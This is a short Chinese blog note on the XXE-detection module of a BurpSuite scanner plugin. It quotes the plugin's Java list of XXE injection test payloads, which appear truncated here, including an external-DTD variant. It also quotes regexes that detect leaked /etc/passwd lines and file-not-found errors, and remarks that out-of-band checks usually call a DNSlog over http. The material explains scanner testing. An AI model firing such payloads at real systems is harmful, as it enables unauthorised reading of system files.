【76】XXEParameterModule

payload

    private static final List<byte[]> XXE_INJECTION_TESTS = Arrays.asList(
            "]>&xxe;".getBytes(),
            // https://twitter.com/Agarri_FR/status/656440244116574208
            " %dtd;]>]]>".getBytes()
            );

一样的
一个是打did一个是直接解析回显
match

    private static final List<Pattern> XXE_RE_MATCHES = Arrays.asList(
            Pattern.compile("root:.*:0:[01]:", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("file not found", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE),
            Pattern.compile("java\\.io\\.FileNotFoundException", Pattern.CASE_INSENSITIVE | Pattern.DOTALL | Pattern.MULTILINE));

但通常打did不用file测试,用http协议会比较常见可以打DNSlog

后话

Down

你可能感兴趣的:(BurpSuite插件,java,servlet,前端)